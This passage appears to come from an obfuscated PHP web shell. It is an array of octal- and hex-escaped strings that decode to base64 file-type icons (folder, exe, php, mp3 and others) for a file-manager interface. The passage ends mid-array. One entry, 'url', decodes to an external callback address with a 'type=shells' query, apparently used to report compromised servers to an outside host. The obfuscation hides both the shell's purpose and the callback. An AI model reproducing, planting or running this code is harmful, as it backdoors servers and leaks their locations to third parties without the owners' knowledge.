8\157\x68\x59\111\113\151\x79\x52\130\103\x76\x53\160\x2f\x51\x68\x76\x63\x49\x6c\x34\147\x68\x46\105\113\x68\x4d\x71\153\x48\147\132\x43\x56\171\127\x42\x48\x49\x77\57\106\x49\143\x5a\x41\x41\x43\x67\x30\x4e\106\147\x6b\x41\123\104\105\x49\104\x42\x73\141\107\147\x77\x49\x53\102\167\126\x47\x4a\123\x55\103\x33\x39\106\x48\102\117\x55\102\122\111\106\x47\x42\x6b\125\x6d\x45\111\x64\x46\66\101\x58\x48\102\60\x63\160\150\x6b\130\x48\x55\x4d\x77\106\167\x61\157\121\x36\163\x48\x46\x31\x78\103\x73\x61\116\x43\x71\x37\155\x49\167\115\105\170\x51\x51\101\67", "\x66\x6f\x6c\x64\145\162" => "\151\126\x42\117\122\x77\60\113\107\x67\x6f\101\x41\x41\101\116\123\125\150\x45\125\147\101\x41\101\102\101\101\x41\101\101\x51\x43\101\131\x41\x41\x41\101\x66\x38\x2f\x39\150\101\101\x41\x41\x42\x6d\x4a\x4c\122\60\121\101\x41\x41\101\x41\101\x41\104\x35\121\67\x74\x2f\x41\101\x41\x41\x43\x58\102\111\x57\x58\115\x41\x41\x41\63\x58\101\101\101\x4e\61\167\106\103\x4b\112\164\64\101\101\101\101\102\63\x52\112\124\x55\125\x48\x31\x51\163\113\105\152\x6b\x4e\x2b\144\x31\x77\125\x41\101\x41\x41\130\x39\x4a\122\105\x46\x55\x4f\x4d\x75\x6c\153\125\62\x49\125\154\105\131\x68\160\x39\152\113\166\65\x41\x70\x6f\x73\x51\x57\147\122\102\164\x41\x36\x43\155\x53\103\141\65\123\x7a\152\x59\x68\x47\x30\161\x59\147\147\x69\x50\x36\x59\63\x57\170\x6d\x74\x72\115\x49\157\x6c\x31\121\115\x38\64\x71\x52\113\x52\x6c\x53\126\103\62\142\x42\143\131\x52\160\165\111\x49\x69\x67\106\x43\x37\106\67\152\60\x66\120\x2f\x57\132\170\67\x51\x72\x69\102\x63\x32\130\104\167\66\143\x77\x2f\x65\70\114\x2b\71\122\x6c\x79\x36\x58\x74\x6f\x72\x46\x34\152\132\124\x4d\163\x59\x45\x35\x38\x44\x63\62\164\166\144\146\x30\113\x45\x31\112\61\x37\x74\53\x58\x36\61\x52\x73\172\x48\67\x58\x32\x65\114\142\63\x6c\x46\66\166\144\66\x56\141\161\124\x32\x50\102\x4a\x53\143\151\x37\121\x2b\164\141\x4a\x4d\x65\116\x74\x34\x4d\x33\63\61\161\106\x71\x70\120\121\103\111\101\x36\124\x54\x47\x59\x37\153\x38\160\105\101\65\60\111\160\143\106\x4d\x4b\x70\122\123\x31\106\71\x58\67\x51\x41\x41\167\x78\x75\102\65\114\161\x38\x2f\71\155\154\x32\115\163\x79\154\x77\167\65\x6e\x62\152\x70\123\x53\117\x6e\120\131\x59\112\155\x4a\70\120\152\152\x58\127\60\x73\x58\115\170\125\x73\x6c\104\63\110\x31\x59\120\x78\x55\110\70\104\x77\130\147\x4a\x2b\57\116\x56\57\141\146\53\143\103\x6e\104\x69\141\x42\123\x43\x6d\164\x53\x61\x64\156\152\x50\x36\x44\115\126\x63\x31\167\x30\x54\57\x42\146\147\130\167\144\114\101\x52\132\116\x59\x4b\62\120\110\147\132\154\x68\x37\53\121\x69\x50\153\111\111\103\111\x6f\160\x52\101\x52\x52\115\x41\x58\x77\x56\x70\x68\x61\110\63\115\x53\x42\151\x4d\x4c\x45\x4d\x72\x35\114\114\112\103\143\104\x7a\130\x49\x37\156\102\156\124\x37\150\150\x39\144\x44\x30\124\150\x49\x34\x77\x48\105\x52\101\105\x6b\x54\105\131\x47\106\155\x5a\101\x48\x35\x31\62\x70\167\53\145\64\x34\x50\x58\x2f\53\x4d\154\167\x4a\63\x45\146\x41\x52\102\101\125\x69\x59\x61\161\126\153\x77\x58\x71\x4c\x31\53\x52\61\x39\57\x4c\x36\x76\171\61\156\x59\141\142\117\x4c\141\x32\x61\x48\156\x5a\64\142\146\63\x37\x38\161\142\161\171\171\162\101\x38\x4b\110\x74\115\x71\x6e\163\117\x4c\64\x41\x41\x41\101\x41\105\x6c\x46\x54\x6b\x53\165\121\155\x43\103", "\x73\155\141\154\x6c\x5f\x75\156\x6b" => "\x52\60\154\x47\117\x44\x6c\150\x45\101\101\x51\101\110\x63\101\101\103\x48\65\102\x41\105\x41\101\112\x55\x41\x4c\x41\x41\101\101\x41\x41\121\101\102\x41\x41\150\x77\101\101\x41\111\145\160\63\102\x45\71\x6d\154\x6c\151\x63\x33\x42\65\151\126\160\152\144\x4d\166\150\57\115\114\143\x2b\171\61\x55" . "\160\x39\x50\155\x2f\x47\x56\x75\146\143\67\152\57\115\x7a\126\x2f\x39\x58\155\x2f\105\x4f\155\71\71\142\156\x2f\x4e\152\x70\57\x61\x37\121\53\x74\x54\x6d\57\114\x48\x53\x2b\145\x58\x77\57\164\63\162\57\x4e\156\x70\x2f\x64\x6a\157\57\116\162\x71\x2f\146\152\67\57\71\166\161\57\x4e\146\x6f" . "\x2f\115\x62\x65\53\70\162\150\57\x4d\156\147\x2b\67\x6a\127\x2b\162\x76\x59\53\162\67\x5a\x2b\67\x58\x52\x39\x64\104\x6b\x2f\116\110\x6b\57\x4e\x4c\154\57\114\124\x55\x2b\x72\156\x58\53\70\172\x69\x2f\x4c\142\126\x2b\53\146\x78\57\145\67\62\x2f\166\x48\x33\x2f\x76\x4c\64\x2f\x75\x33\61" . "\57\145\x33\61\x2f\165\104\165\x2f\144\172\162\57\x4f\162\x7a\57\x65\110\165\x2f\146\x58\66\57\x76\x48\64\x2f\166\x2f\x2f\x2f\x2f\x76\53\x2f\63\x65\x7a\x36\x76\146\67\57\x2f\x54\x35\x2f\153\107\x53\64\x50\x76\x39\x2f\67\x58\x56\x2b\162\x48\x54\53\162\x2f\x62\53\x72\x7a\141\x2b\166\x50\x34" . "\x2f\165\172\60\x2f\165\x72\172\57\x75\x37\x31\57\165\x76\172\x2f\144\x54\x6e\x2f\x4d\57\x6b\57\x4e\63\163\57\144\x76\x72\x2f\143\152\147\x2b\70\x50\144\53\70\x48\143\x2b\163\146\x66\53\x38\124\145\x2b\x2f\x44\x32\57\162\130\x49\70\x72\x48\106\70\x62\162\x4d\x38\67\x66\x4a\70\156\x6d\120" . "\167\162\x33\x4e\x38\66\57\x44\x38\113\166\102\70\106\x39\156\x65\x45\106\x6f\164\105\102\156\164\x45\116\x70\164\105\116\x70\x74\x53\x78\125\160\170\x31\111\x6f\104\154\146\x72\124\122\x63\162\132\145\145\x79\132\141\x63\x78\160\x6d\150\x7a\111\x75\x52\x74\x70\127\x5a\170\x49\165\117\165\113\161\172" . "\71\x5a\117\127\x77\x58\66\x49\x73\x33\x57\x49\x75\x35\x69\155\x30\x37\x72\112\x39\x4a\62\x74\x32\132\x65\153\60\155\x35\x37\162\160\161\x6f\x31\x6e\113\103\x74\x55\126\x72\164\x59\x69\162\63\x76\x66\66\57\x34\66\166\x34\x59\x75\x75\64\127\x5a\x76\146\x72\67\120\x36\x73\x50\x53\x36\x73\x44\121" . "\66\66\x58\102\66\143\x6a\x5a\70\141\57\x4b\67\71\x2f\163\x2f\144\x62\156\x2f\145\172\172\x2f\143\172\x64\x39\155\x4e\60\152\x4b\x54\102\x36\x61\x69\57\67\x36\x57\x39\67\156\x69\130\172\62\107\x43\x77\126\66\101\167\125\144\163\164\130\x79\126\171\x47\123\104\x77\x6e\x6d\131\x7a\x34\x69\157" . "\62\x34\117\151\x31\141\63\102\x34\x35\123\171\64\x61\x65\71\x34\64\103\x63\172\x34\123\x6a\61\156\x32\107\154\147\101\101\x41\101\x41\101\x41\x41\101\x41\x41\101\x41\x41\101\101\101\x41\101\101\101\x41\x41\101\101\101\x41\101\x41\x41\x41\x41\x41\x41\x41\101\101\101\x41\101\x41\101\101\x41\x41\x41" . "\101\101\101\x41\x41\x41\101\x41\101\x41\x41\x41\x41\x41\x41\x41\101\x41\101\101\x41\101\x41\x41\101\101\x41\101\101\x41\101\x41\101\x41\x41\101\101\101\x41\x41\x41\x41\101\101\x41\x41\101\x41\x41\101\101\x41\101\x41\101\101\x41\101\101\101\101\101\101\x41\x41\x41\x41\101\x41\x41\x41\101\101\101\x41\x41" . "\x41\x41\101\101\101\101\101\x41\101\x41\101\x41\101\101\101\x41\x41\101\x41\x41\x41\x41\x41\x41\101\101\101\101\x41\x41\x41\101\x41\101\x41\101\101\101\101\x41\101\x41\101\x41\101\x41\x41\101\x41\x41\101\101\x41\101\x41\101\x41\101\x41\101\101\101\x41\101\x41\x41\x41\x41\x41\x41\101\101\x41\x41\x41\101" . "\x41\x41\x41\x41\101\101\x41\101\101\101\x41\x41\x41\101\101\x41\x41\101\101\x41\101\101\101\x41\101\x41\101\101\101\101\101\x41\x41\x41\101\101\x41\101\101\101\x41\x41\101\x41\101\x41\101\101\x41\101\101\101\x41\101\101\101\x41\x41\101\x41\x41\101\101\x41\101\101\x41\101\101\101\101\x41\101\101\x41\x41" . "\101\x41\x41\101\x41\101\x41\101\101\101\x41\x41\x41\101\x41\101\101\x41\x41\101\x41\x41\x41\101\101\101\101\x41\x41\x41\101\101\101\x41\101\101\101\x41\101\101\101\x41\101\x41\101\x41\x41\x41\101\101\101\x41\101\101\101\x41\101\101\x41\x41\x41\x41\x41\101\x41\x41\101\101\x41\x41\101\x41\101\x41\x41\x41" . "\101\x41\101\x41\101\101\101\x41\x41\101\x41\x41\x41\x41\x41\101\x41\101\101\101\x41\x41\x41\x41\101\x41\x41\101\101\101\101\101\101\101\x41\101\101\101\x41\101\x41\x41\x41\101\101\x41\x41\101\x41\x41\x41\x41\x41\101\101\101\x41\x41\101\x41\x41\x41\101\x41\x41\101\101\101\x41\101\x41\101\x41\101\101\x41" . "\101\101\x6a\x6e\x41\103\x74\x56\103\x6b\x43\167\64\112\170\x4a\x41\121\x51\x71\106\x42\x6a\101\170\157\x30\x4d\x4e\107\161\x73\101\102\121\x41\150\66\x43\x46\x41\x33\156\153\x30\115\x48\151\122\x52\x45\126\x44\x68\172\x73\x6f\x4c\121\167\x41\x4a\x30\147\124\x34\x54\157\145\x63\x53\110\x41\x59\115\x7a" . "\x61\121\x67\x6f\104\116\x43\x43\x53\102\x34\105\101\156\x49\x6d\103\x69\123\x42\152\125\171\x47\114\x6f\142\147\x58\x42\x54\x70\153\x41\x41\x35\x49\x36\x70\147\x6d\123\153\x44\172\65\x63\165\115\123\x7a\x38\171\127\154\x41\x79\x6f\x43\132\x46\x47\x62\x34\x53\x51\113\x68\x41\x53\115\x42\130\112\x70\x4d" . "\165\x53\x72\121\105\121\167\153\x47\x6a\131\153\121\103\x54\101\171\66\101\x6c\125\x4d\x68\127\153\154\121\102\x77\64\x4d\105\150\147\123\101\66\x58\x50\x67\x52\170\123\x35\151\151\x34\60\113\114\x46\147\x69\64\102\x47\124\105\x4b\101\163\x43\113\x58\x69\150\x45\123\x43\x7a\162\x73\x67\123\121\103" . "\x79\x49\153\125\x56\53\123\x71\117\x59\x4c\103\x41\64\143\163\101\165\x70\70\66\x4f\107\x44\153\116\167\64\x42\160\121\x34\x4f\141\102\106\147\102\60\x54\105\171\x49\x55\113\161\x44\167\124\x52\x73\64\x61\x39\171\115\x43\123\x4f\x6d\x44\102\x6f\171\x5a\x75\x34\163\x4a\113\103\x67\167\x49\x44\152" . "\171\x41\x73\x6f\x6b\102\x6b\x51\101\104\x73\75", "\165\162\x6c" => "\141\x48\122\x30\143\104\157\x76\114\62\64\x77\x64\x48\143\165\x59\x57\170\60\x5a\x58\x4a\x32\141\130\116\x30\131\123\65\166\x63\x6d\143\x76\x59\x79\x35\x77\141\110\101\57\144\110\x6c\x77\132\124\61\172\x61\x47\x56\x73\142\x48\x4d\155\131\172\60\75", "\145\170\x74\x5f\x6d\x70\63" => "\122\60\154\x47\117\104\x6c\150\x45\101\x41\121\101\x43\111\x41\101\103\x48\65\102\101\x45\101\x41\x41\131\101\x4c\x41\101\101\101\x41\x41\x51\101\x42\x41\x41\147\x67\x41\x41\101\120\x2f\57\57\x34\x43\x41\147\115\104\101\167\x49\103\101\101\x50\57\57\101\101\101\101\101\x41\x41\x41\x41\x41\116\125" . "\141\x47\162\123\x37\x69\x75\113\x51\x47\x73\131\111\x71\160\160\66\x51\x69\x5a\x52\x44\x51\127\x59\x41\111\x4c\x51\x51\123\x41\x32\147\x32\157\64\x51\157\x41\123\x48\x47\x77\x76\x42\142\x41\116\x33\x47\x58\61\x71\x58\x41\x2b\162\x31\x61\102\121\110\122\132\110\x4d\x45\104\x53\x59\103\x7a\63\x66\x63" . "\x49\x47\164\x47\x54\x38\167\101\x55\167\154\x74\172\167\x57\x4e\x57\x52\x56\63\114\x44\156\x78\131\115\61\165\142\66\x47\x6e\145\104\167\x42\101\104\x73\x3d", "\x65\x78\x74\x5f\x65\x78\145" => "\122\60\x6c\x47\x4f\x44\x6c\150\x45\167\x41\117\101\113\x49\x41\101\101\x41\x41\101\x50\x2f\x2f\57\x77\x41\101\x76\143\x62\x47\170\x6f\123\x45\150\x50\57\57\x2f\x77\101\101\x41\101\101\101\x41\103\x48\x35\102\x41\105\x41\x41\101\x55\101\x4c\101\x41\101\x41\x41\101\x54\101\101\64\x41\101\101\x4d\x37" . "\x57\x4c\x54\x63\x54\x69\127\123\121\x61\165\164\102\x45\x51\x31\x68\120\53\x67\154\62\x31\x54\113\x41\x51\x41\151\x6f\x37\123\x38\x4c\170\x61\x47\x38\x78\60\x50\142\117\x63\x72\x51\x66\64\164\x4e\x75\x39\x77\141\x38\127\110\x4e\113\113\x52\154\64\x73\154\53\x79\x39\x59\x42\x75\x41\144\x45\161\164" . "\170\x68\111\101\x4f\x77\x3d\75", "\145\170\x74\137\x68\164\x6d\154" => "\151\126\102\x4f\122\167\x30\113\x47\147\x6f\x41\x41\101\101\x4e\123\x55\x68\x45\x55\x67\x41\x41\x41\102\x41\x41\101\101\x41\121\x43\x41\131\101\x41\101\101\146\70\x2f\x39\150\x41\x41\x41\101\102\107\144\x42\124\125\105\101\x41\113\57\x49\116\167\127\113\x36\x51\x41\101\x41\102\154\x30\x52\x56\x68\60\125\62\x39\155\144\110\x64\150\143\155\x55\101\x51\127\122\x76\x59\155\x55\147\x53\x57\61\x68\132\62\126\123\132\127\106\x6b\x65\130\110\x4a\x5a\124\x77\x41\101\x41\120\x33\x53\125\122\102\x56\x48\152\141\x59\164\170\x78\65\x42\x59\x44\x49\x77\115\x55\x4d\x44\114\105\123\x49\x6a\171\x54\145\122\x69\x5a\62\x48\x34\57\57\x38\x2f\x57\x4f\x67\166\105\120\x2f\x36\x39\132\x66\150\x35\x2b\71\57\104\111\x38\145\x76\63\x6a\x78\x39\116\107\x44\x4b\101\131\155\x70\x6f\x76\x63\57\x4d\111\115\x63\66\x65\x30\x4d\x77\x41\x45\x45\x41\163\x7a\x45\171\x50\x44\x50\66\150\x2b\160\156\x39\57\x4f\122\x57\x6b\x42\x59\126\x34\x4f\126\154\150\x52\152\x4c\70\102\x70\162\x7a\x35\145\164\146\x68\156\x63\146\120\x6a\120\70\154\x35\x49\121\64\x75\x56\x68\63\63\x4c\x74\62\x69\61\x66\x6f\x41\x55\x58\x51\x50\111\101\x41\143\x53\151\x72\103\x33\x46\x38\x50\157\x58\111\70\x4e\x37\112\155\141\107\162\x77\x39\146\57\x2f\172\x36\x37\x53\70\x44\x43\172\x4d\x72\101\167\x76\x6a\x50\x77\x5a\127\x56\x6b\x59\x47\160\x76\x2b\115\x44\x49\x78\x41\112\x7a\x49\x42\x35\x56\154\132\107\102\x67\x73\x6a\124\x52\154\x57\x46\151\131\116\x39\71\57\57\102\160\x73\103\105\101\x41\163\142\103\x78\163\x54\x43\x77\115\152\105\170\57\x50\x33\x4e\x5a\x50\155\x63\x53\x54\102\x32\x2f\125\116\155\102\163\x62\57\57\170\151\53\x66\166\63\x44\x6f\x43\110\x38\154\70\x46\106\154\x5a\155\102\x67\x34\127\126\147\132\x32\144\x6c\x65\110\x48\162\71\70\x4d\x6c\62\67\x63\131\57\x6a\120\x77\103\172\104\x78\143\62\63\x42\145\x6a\x4c\121\x49\101\x41\x41\105\105\x41\166\166\70\103\101\167\110\x2f\101\x50\124\61\x2f\x6c\x2f\154\x37\120\53\x2f\111\122\167\110\122\x45\105\164\x42\121\101\155\x4a\147\x49\101\x2b\147\x34\107\101\113\x48\125\102\147\103\107\x75\x66\x51\101\71\x66\142\61\x41\101\x67\x46\101\167\101\123\105\x41\167\101\71\146\x66\53\101\x4f\152\162\x38\121\101\x46\102\147\x6f\x62\x2f\x50\172\x39\x59\x51\113\x49\66\x65\x50\120\x2f\x37\x71\x48\67\x7a\x42\x50\65\107\112\x68\131\x74\146\152\132\62\113\121\101\x6e\x71\146\x43\145\150\x55\157\111\125\115\156\106\172\115\104\102\x75\166\70\x54\101\163\x4f\120\x53\145\101\x57\147\x6b\x30\107\166\115\104\x4e\170\x63\x37\101\x78\x43\x76\117\x77\115\64\x73\x49\x38\x51\x4a\146\70\x2f\x77\163\121\121\x43\x7a\x62\x62\57\71\x4c\57\166\x47\114\x67\144\x39\113\x6b\x6f\x48\x68\x30\63\143\107\150\x6b\x75\57\107\102\x68\145\146\x6d\126\x67\x2b\101\x6a\105\x51\110\x46\x67\170\x44\x41\x7a\162\x44\x72\64\156\x63\106\x4b\57\152\x6b\104\x44\170\x63\x66\x4d\104\x77\131\x47\142\151\x34\117\x42\150\x59\x67\x46\64\x48\x42\163\x31\x2f\x67\101\102\x69\117\x6e\146\x39\x70\x2f\155\x72\x54\x37\70\x5a\130\x76\71\x68\x59\110\152\x33\155\64\110\x68\x38\150\115\x47\x68\161\x75\120\x47\x42\x67\145\x76\x6d\x52\x67\145\120\53\116\x67\145\110\120\x35\x2b\70\115\164\171\71\70\132\x4c\x6a\53\x2b\x44\x30\104\x4b\57\116\57\x42\x6d\x34\x4f\144\155\x44\101\57\155\x44\147\x35\x32\x51\x44\170\172\x74\101\x41\x44\x47\71\146\x50\x79\104\x62\x2f\x65\x52\x44\x77\x7a\124\152\x76\170\x6d\x41\112\162\102\131\x41\170\x30\x79\126\53\147\172\146\x65\x42\102\166\x7a\x36\x38\x70\x66\x68\x36\64\x50\x58\x44\x4f\170\143\162\x41\170\x2f\x2f\x34\x4a\151\x68\x34\x6d\102\x44\122\x67\126\120\104\170\101\x6c\x77\104\x5a\x6f\x4e\147\x42\x43\x43\103\155\x50\172\x2f\x2f\x50\x6e\x31\65\53\151\x58\x44\151\171\165\146\x47\106\x35\x2b\101\x4e\156\x41\x77\115\x44\66\66\171\x66\x44\172\x63\x4e\x50\107\111\123\57\x76\127\142\x34\53\165\111\x54\x41\x79\143\x76\105\61\151\x63\x6d\121\x55\131\x6c\141\x79\163\104\x46\x38\57\x76\x77\115\x47\113\150\115\x34\156\x51\101\x45\105\x4e\117\x7a\x38\x34\164\x32\151\x34\x6d\112\115\110\151\131\x63\x44\x4e\111\x38\104\x4d\x79\x43\x41\112\144\x5a\x69\x34\x46\x6a\102\71\114\126\147\x5a\x39\126\127\64\107\105\127\x6c\x65\x42\147\127\x4a\110\167\170\x53\x51\x45\117\131\147\144\110\65\110\65\x6a\x73\x52\x45\x54\106\x47\x66\64\104\60\167\125\157\162\x51\x49\105\x45\116\117\104\121\x35\115\127\161\62\x68\x39\x75\123\125\164\x79\70\x45\147\112\143\104\101\111\x4d\x66\117\167\117\103\160\x79\x38\106\121\153\151\142\x4f\157\x4b\142\x4f\171\53\101\141\x4b\x4d\x62\x67\x59\146\x69\122\121\x56\x78\105\104\117\150\x6b\x46\x67\x5a\155\131\x4a\160\65\x38\146\167\x4a\x4d\x47\152\57\x41\153\117\101\x6b\x51\x45\x67\147\x46\x68\53\146\110\152\65\x34\x75\114\161\61\x50\150\x54\x75\x72\115\130\x50\x58\161\153\x70\163\x72\65\53\121\115\104\x44\172\x63\172\x41\x35\x63\115\x4c\70\x4f\172\x4e\x35\x38\x59\102\116\53\x64\x59\67\104\x53\x45\x47\114\x67\x46\x78\x4a\x6c\53\x41\x55\115\150\63\x2f\x2f\x2f\x6a\104\111\171\x73\x67\104\x77\167\57" . "\153\x67\x76\x38\115\x41\x41\110\x45\x44\x50\x4c\110\61\x39\145\120\156\x70\x7a\143\163\x6d\x7a\114\x7a\x64\x75\x76\x46\124\x34\x7a\113\x47\x75\143\x4f\120\x2b\x4d\x34\146\146\x6e\132\167\171\x4b\x72\x49\70\132\142\104\126\105\107\102\123\125\116\131\x44\161\147\x52\x72\x2b\x2f\x57\x64\147\101\x74\x4c\63\x37\x74\170\147\x45\x41\x5a\x36\x59\71\130\113\154\x61\x63\x41\x41\x6f\147\106\x6c\155\x6e\53\146\156\164\63\130\53\142\x76\66\x65\60\x4c\66\164\162\x38\x50\67\x35\67\102\64\x79\112\x76\x77\x7a\143\166\111\x49\115\142\x42\171\x63\x44\x48\x2b" . "\x42\156\166\60\116\172\x49\x33\x41\104\115\110\167\x35\x2b\70\57\x42\x67\61\x64\131\167\x59\155\x4e\155\x42\53\x59\127\x58\154\x41\101\147\147\x52\x45\x34\107\x78\x73\x6e\x55\x65\x65\x76\x30\71\53\x7a\141\x6c\166\x44\163\x79\123\117\147\167\x59\x7a\147\104\x41\x32\171\x39\124\57\x44\x66\x33\152\x75\x42\x44\106\x42\x50\x42\x59\x57\x4e\163\142\142\116\70\66\x66\102\101\x67\x77\101\104\63\x6e\x55\x31\x37\x57\62\x46\x32\153\101\101\101\x41\101\105\154\x46\124\153\x53\x75\121\x6d\103\103", "\145\x78\164\x5f\152\160\147" => "\151\x56\x42\x4f\x52\x77\60\113\x47\x67\157\101\x41\101\x41\116\123\x55\150\x45\x55\147\101\101\x41\102\x41\101\x41\101\x41\121\x43\x41\131\x41\101\101\x41\146\x38\x2f\71\x68\x41\101\x41\103\x6a\125\154\x45\x51\x56\x51\x34\152\127\x32\123\124\127\x38\152\122\122\103\107\156\x2b\x72\x70\53\125\150\x47\144\x6d\113\x50\x4e\x35\131\x68\x77\x59\x46\x49\x44\x75\170\110\104\162\x6e\64\x48\x75\66\x52\x79\x45\x2f\x59\x43\70\157\120\171\102\x2b\x42\x41\172\154\x79\x7a\157\125\x6a\x53\x41\147\x4a\x72\x62\x52\111\x35\x49\113\x45\x45\155\x6d\x46\131\113\x4e\x49\63\154\154\x32\x62\114\x50\170\142\x70\x5a\x78\156\x4a\x35\165\104\x6a\116\x78\163\150\112\71\66\x47\x71\x70\x75\160\x35\x36\x75\x39\x34\x57\x35\170\x77\x48\x42\x77\146\102\x2f\166\x37\x2b\154\60\x6f\x70\65\x5a\167\124\x67\120\x2b\112\152\155\x6f\126\122\x65\x48\62\x39\166\x61\x2b\x50\152\60\x39\114\x54\124\101\171\163\x72\113\64\x70\115\57\60\66\71\x2b\x66\104\131\101\x35\x76\143\x41\x45\105\102\105\121\101\x51\154\x35\146\156\x7a\x33\x69\160\112\153\x6e\167\104\154\x49\x41\157\151\x6c\121\x59\150\152\x53\x61\x44\x51\103\x55\x53\106\153\x73\147\x6c\122\106\123\x6c\x51\132\154\122\x41\166\x4c\x72\103\x31\164\x61\127\x42\x4b\x77\60\x51\102\111\x46\x61\x72\163\x56\x73\146\x42\147\147\126\x56\163\102\102\x45\106\105\x69\110\x77\120\x42\x37\124\151\x69\x4c\x64\x58\150\x73\141\151\60\x4f\154\x30\x4e\x45\x43\65\141\x65\62\164\x4a\70\x75\105\x64\x63\130\x6f\x33\132\x54\x38\62\x6a\101\x31\x42\145\111\143\x6a\143\147\x6e\104\x6a\x53\x65\x45\160\x59\104\x43\x37\x7a\154\172\146\x43\103\126\x71\x74\x31\103\x77\152\104\x55\x50\x33\x38\67\x49\167\x66\x2f\156\151\112\162\172\61\70\172\70\120\x58\x48\162\x58\111\65\63\x46\x2f\154\x53\x51\x59\125\167\x38\163\123\x6f\101\x61\130\104\x62\166\153\x61\x56\57\53\x33\143\102\x6e\x68\143\166\70\x45\x47\x79\x50\102\x39\145\x4c\x66\x52\64\61\113\x6e\x52\161\121\x63\x30\x77\x67\x62\65\x39\102\53\53\x48\57\x33\113\114\170\x65\156\162\103\57\x63\x5a\x7a\x31\141\71\145\131\x41\63\57\144\x56\147\144\102\131\x38\110\152\x59\152\156\x6a\x51\x44\x71\152\x48\67\170\x6a\x6b\x66\x2f\x46\x6b\53\111\162\156\53\125\164\53\145\166\60\x62\x36\x64\x55\111\147\x4d\x66\x52\132\167\122\102\143\101\164\x51\x53\x71\x6e\x2b\170\60\60\53\57\x57\152\113\x69\62\156\x47\70\142\71\152\x70\x70\145\x7a\x79\154\113\x66\x75\x75\67\171\170\142\x31\165\65\x59\162\x77\161\x50\x61\x41\171\61\144\166\x62\x67\110\117\117\127\156\126\x6d\67\x52\157\70\x6f\x6c\x7a\63\x50\x6b\x7a\164\x2f\53\150\x4b\x70\142\x4b\64\x71\x66\x71\161\132\x6f\x44\171\156\x79\132\115\115\141\x51\132\122\155\124\171\x59\x53\151\113\117\x68\x32\165\x32\x52\132\x68\152\x47\107\117\x49\65\132\127\61\x76\104\117\132\153\130\x71\101\x71\147\x62\x75\152\130\x31\71\x63\115\102\x67\120\x4f\172\163\x34\x77\170\156\102\x79\143\x73\x4a\x34\120\x4b\x62\x64\x62\155\117\x4d\x77\123\105\x55\61\x6d\x4b\x74\x5a\x51\67\x77\x50\105\70\x72\x70\x64\x36\124\165\142\123\60\x78\120\142\x32\x4e\166\x31\53\x6e\172\x7a\x50\171\142\113\x4d\x38\57\x4e\x7a\x43\x6d\116\x78\x74\155\x41\x32\x6d\x38\156\144\x49\130\x6f\63\124\60\x6a\x54\154\106\66\x76\x52\x37\120\x5a\160\x48\113\x49\156\x5a\x30\x64\162\x49\x57\116\x6a\x52\65\121\x6f\x4c\x58\x48\x38\146\110\170\65\x65\x37\x75\x62\x71\154\x41\141\66\61\166\x4f\x6d\71\x75\x62\160\x49\x6b\x79\x58\x74\x71\x6e\x43\x74\156\x41\65\131\157\x69\x68\x67\x4f\150\x37\70\146\x48\x68\66\x2b\x6e\x69\166\111\70\57\167\151\124\x64\x4e\166\156\x58\115\127\163\x4d\64\65\x4b\171\114\x57\117\x57\145\144\x77\170\142\127\106\143\142\115\142\x42\x53\107\163\70\x6c\x6b\x6b\150\x30\144\110\130\60\63\107\x6f\x32\155\101\120\70\x42\132\x4e\x67\103\104\x59\144\155\71\x6f\x34\101\101\x41\x41\x41\123\125\126\x4f\x52\x4b\x35\x43\131\x49\111\75", "\145\170\x74\x5f\x70\150\x70" => "\122\60\x6c\107\117\104\x6c\150\x45\101\x41\x51\x41\101\101\x41\x41\103\110\65\102\101\x45\101\101\101\x45\101\x4c\101\x41\101\101\x41\101\x51\x41\x42\101\x41\147\101\x41\101\101\101\101\x41\101\x41\x49\x6d\104\x41\x36\150\171\x35\162\127\60\x48\x47\157\163\146\146\x73\144\124\x70\161\x76\106\154\147" . "\x74\60\150\153\171\132\x33\121\66\161\154\157\x5a\67\112\151\155\x6f\x6d\x56\x45\x62\x2b\165\130\x41\x41\x41\117\167\x3d\x3d", "\145\x78\164\x5f\160\154" => "\x52\60\x6c\x47\117\104\154\150\106\x41\x41\x55\101\113\114\x2f\x41\120\57\x34\x2f\70\104\101\167\x48\x39\57\x41\x50\x2f\64\x41\114\53\x2f\166\167\101\101\101\x41\x41\x41\x41\x41\101\x41\x41\x43\x48\65\x42\101\x45\101\x41\101\105\101\x4c\x41\101\101\x41\x41\x41\125\101\102\x51\101\x51\101\115\157" . "\x47\114\x72\143\x33\x67\x4f\101\115\x59\122\64\x4f\117\x75\144\162\145\x65\x67\122\154\x42\x57\123\x4a\x31\154\x71\113\x35\x73\66\64\114\x6a\127\106\63\143\121\115\152\x70\x4a\x70\104\x66\66\57\57\x41\x42\101\101\67", "\145\x78\164\x5f\x73\167\146" => "\x52\x30\154\x47\117\104\154\150\x46\x41\x41\x55\101\115\x51\122\x41\120\x2b\143\156\120\x39\123\x55\163\64\101\101\120\x2b\143\101\x50\x2f\117\101\111\x51\101\x41\120\71\152\101\115\x35\x6a\x6e\x4d\x36\x63\131\70\66\143\156\113\130\117\71\x38\142\145\x78\160\x77\x41\101\x50\x38\x78\x41\120\x2f\x4f" . "\x6e\x41\101\101\x41\x50\57\57\57\57\57\x2f\57\x77\101\101\x41\x41\x41\x41\101\101\x41\x41\101\x41\x41\x41\x41\x41\101\101\x41\x41\101\x41\x41\101\101\101\101\x41\101\101\101\x41\x41\x41\101\x41\101\101\x41\101\101\x41\101\x41\101\101\101\101\101\101\101\x41\x41\101\101\x43\110\65\102\x41\x45\x41" . "\101\x42\105\101\114\101\101\x41\101\101\x41\125\x41\x42\121\x41\x41\x41\x56\67\x59\103\123\x4f\132\x47\155\145\66\120\x6d\163\142\115\x75\161\125\103\x7a\120\60\x41\x50\114\x7a\x68\101\x62\x75\120\x6e\121\x41\x77\x65\105\x35\62\x67\60\146\104\113\103\115\107\x67\157\117\x6d\64\x51\102\64\x47\x41" . "\x47\102\147\x61\x54\62\x67\115\121\x59\147\126\x6a\125\x66\x53\124\x33\x59\157\x46\x47\x4b\x42\122\x67\x42\x71\120\152\147\x59\x44\105\106\x78\130\x52\160\x44\x47\105\x49\x41\x34\170\101\x51\121\116\x52\x31\x4e\x48\x6f\x4d\x45\101\101\103\101\102\x46\150\x49\x7a\70\x72\103\156\143\x4d\101\x47\147\103" . "\116\171\163\114\x6b\x44\x4f\x54\123\x43\x73\112\x4e\x44\x4a\x61\x6e\124\x55\161\114\161\115\x32\113\x61\x61\156\161\102\105\150\101\x44\163\75", "\x65\x78\164\x5f\x74\141\x72" => 